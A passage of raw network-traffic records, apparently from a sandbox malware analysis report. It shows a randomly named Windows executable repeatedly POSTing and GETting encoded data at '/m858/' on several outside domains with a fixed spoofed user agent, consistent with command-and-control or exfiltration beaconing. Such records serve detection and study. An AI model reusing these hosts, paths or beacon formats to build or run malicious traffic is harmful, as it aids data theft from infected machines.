                                                                                                                      Dec 7, 2023 13:44:01.022205114 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49727 | 217.144.107.2 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:02.919095993 CET | 1736 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.sorenad.com
                                                                                                                      Origin: http://www.sorenad.com
                                                                                                                      Referer: http://www.sorenad.com/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:44:03.748363018 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      transfer-encoding: chunked
                                                                                                                      content-encoding: br
                                                                                                                      vary: Accept-Encoding
                                                                                                                      date: Thu, 07 Dec 2023 12:44:03 GMT
                                                                                                                      server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49728 | 217.144.107.2 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:05.771411896 CET | 441 | OUT | GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dNPSr5MT6J+IM8w== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.sorenad.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:44:06.698573112 CET | 450 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Connection: close
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      x-redirect-by: WordPress
                                                                                                                      location: http://sorenad.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dNPSr5MT6J+IM8w==
                                                                                                                      content-length: 0
                                                                                                                      date: Thu, 07 Dec 2023 12:44:06 GMT
                                                                                                                      server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49729 | 64.190.62.22 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:12.289243937 CET | 727 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Origin: http://www.medical-loan24.live
                                                                                                                      Referer: http://www.medical-loan24.live/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=Fu9rMOIxR5RRzR7c4XkyaX/TuNuxl7vwPPmiaKDd2vHAiDc1lrVO4YYRPTFlw1jrdVMVSdsL8li7J8IugUCJ8oqDD2lJZ3MDtzTjUxMAMaiZbiLiFKJ/9VVmrgWk+GdI+T7yQYDuItZ0MwJ4qE2GxxPmELyqral9eEGowRM2sXfBhBlALA==
Dec 7, 2023 13:44:12.532447100 CET | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                      date: Thu, 07 Dec 2023 12:44:12 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 154
                                                                                                                      server: NginX
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49730 | 64.190.62.22 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:15.059993029 CET | 747 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Origin: http://www.medical-loan24.live
                                                                                                                      Referer: http://www.medical-loan24.live/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=Fu9rMOIxR5RRzyzc6wwyPn/cjdux8rv0PPiiaP6Y2dTAijs1kv5O5YYREzEh6VjedVAnSZkL8hC7J94uhjWO84qNF2lxWXMDtzTjUxIqMbGZHC7iFrJ4w1VlogWkpWdU+T6nQdrAIrd0Mx54rQiF7xOtbbzKl7cYbDi34Hg6qzWet0JTM4QhO7exPDoqKw4miz+p1AI=
Dec 7, 2023 13:44:15.304295063 CET | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                      date: Thu, 07 Dec 2023 12:44:15 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 154
                                                                                                                      server: NginX
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49731 | 64.190.62.22 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:17.824562073 CET | 1760 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Origin: http://www.medical-loan24.live
                                                                                                                      Referer: http://www.medical-loan24.live/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:44:18.070101023 CET | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                      date: Thu, 07 Dec 2023 12:44:17 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 154
                                                                                                                      server: NginX
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49732 | 64.190.62.22 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:20.591294050 CET | 449 | OUT | GET /m858/?nRRpS=IsVLP75BXPV29irb7QUBT0f93P2nzsiWNaG7Z6nH6v/C9T4Z/rVV4+geNHA05yDya3IUff47iHu4NOYvgxXZw665HDhGdi01yA==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:44:20.858994007 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                      date: Thu, 07 Dec 2023 12:44:20 GMT
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      transfer-encoding: chunked
                                                                                                                      vary: Accept-Encoding
                                                                                                                      x-powered-by: PHP/8.1.17
                                                                                                                      expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                      cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                      pragma: no-cache
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EJUp5KdbrxzYAfM8NVJZnKeT/nFd/Y7dLK8ktm8yWQMbQDjvRtW/h2YzQndXJcO2P2u6o2fb/VsoHBtoJ3VdaA==
                                                                                                                      last-modified: Thu, 07 Dec 2023 12:44:20 GMT
                                                                                                                      x-cache-miss-from: parking-646d69ff84-sfz8x
                                                                                                                      server: NginX
                                                                                                                      connection: close
                                                                                                                      Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EJUp5KdbrxzYAfM8NVJZnKeT/nFd/Y7dLK8ktm8yWQMbQDjvRtW/h2YzQndXJcO2P2u6o2fb/VsoHBtoJ3VdaA==><head><meta charset="utf-8"><title>medical-loan24.live&nbsp;-&nbsp;medical loan24 Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="medical-loan24.live is your first and best source for all of the information youre looking
Dec 7, 2023 13:44:20.859024048 CET | 1286 | IN
                                                                                                                      Data Ascii: for. From general topics to more of what you would expect to find here, medical-loan24.live has it all. WAECe hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49733 | 207.244.126.150 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:27.335797071 CET | 730 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.speedbikesglobal.com
                                                                                                                      Origin: http://www.speedbikesglobal.com
                                                                                                                      Referer: http://www.speedbikesglobal.com/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=x/Dq0OSjcWbnwZSYl05yv/+K8rQ1/RqsAHFWcoDKsYKB7P5UMhVa8lAHDCExcN5rJBu2wlCuuRBf4I62Bjly0cs5ZduOvj0pL4uAxMsvqsHBRwFl8wHAAPxh357pRapLFAHnh8q9yKIrLBZThT3f8+Zw6rbXn3DDemrU6HMxLH02gx88qQ==
Dec 7, 2023 13:44:27.496795893 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:27 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49734 | 207.244.126.150 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:30.018948078 CET | 750 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.speedbikesglobal.com
                                                                                                                      Origin: http://www.speedbikesglobal.com
                                                                                                                      Referer: http://www.speedbikesglobal.com/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=x/Dq0OSjcWbnx66Yq3By4v+JlbQ11xqoAHJWcp3jttaB6r9UNgVa9lAHIiE0C95gJBjBwnmuuVpf4IK2BQ911MssANuQhD0pL4uAxM5KqsPBRFNl6RHHefxm257pa6pHFAHVh+eHyIgrLApTmGbQ1+ZynbaIhniuVlSy0kYNHzlTsEQvtrbZcXrdW/dKGtX/UywQUBg=
Dec 7, 2023 13:44:30.181188107 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:30 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 49735 | 207.244.126.150 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:32.706060886 CET | 1763 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.speedbikesglobal.com
                                                                                                                      Origin: http://www.speedbikesglobal.com
                                                                                                                      Referer: http://www.speedbikesglobal.com/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:44:32.867677927 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:32 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.8 | 49736 | 207.244.126.150 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:35.378384113 CET | 450 | OUT | GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyM5CO9qwuDsBag== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.speedbikesglobal.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:44:35.550909042 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:35 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 49737 | 162.240.81.18 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:41.085377932 CET | 727 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=2qGyi+XoXiouTjdqimJweq7I3THPohJza8Go3XuAlOj+YNl/ADTBTgPmukooB+OUs0VF0hGSnBqVEZgyVrGFpLzJq5wqZuJ8mAvp57J61LnXaU3gB6qc44f7VvxviWEJfvQ+p1bS4y3fQl04qjHjddquLXTnM+KPMvojiRzE+PbJNmP8lw==
Dec 7, 2023 13:44:41.281639099 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:41 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
Dec 7, 2023 13:44:41.281702995 CET | 1286 | IN
                                                                                                                      Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
Dec 7, 2023 13:44:41.281744957 CET | 1251 | IN
                                                                                                                      Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 49738 | 162.240.81.18 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:43.810091019 CET | 747 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=2qGyi+XoXiouSA1qvlhwbK7HrDHPhBJoa8Ko3TWQl83+YoB/BCTBQgPmmEoheuOPs0RN0gKSnAKVEY8yVYuKobzPlZwoUOJ8mAvp5/hQ1LfXdnvgAYCD1Yf4SvxvoGENfvQQpw654w/fQgI4qWq1WdqoF3SRfvLVIdYLqwDViorHIzjviDpvKaeTtSeA64dCDCuYVOo=
Dec 7, 2023 13:44:44.006035089 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:43 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                      Dec 7, 2023 13:44:44.006094933 CET | 1286 | IN
                                                                                                                      Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                      Dec 7, 2023 13:44:44.006110907 CET | 1251 | IN
                                                                                                                      Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      31 | 192.168.2.8 | 49739 | 162.240.81.18 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 13:44:46.528450966 CET | 1760 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 13:44:46.724708080 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:46 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                      Dec 7, 2023 13:44:46.724741936 CET | 1286 | IN
                                                                                                                      Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                      Dec 7, 2023 13:44:46.724787951 CET | 1251 | IN
                                                                                                                      Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
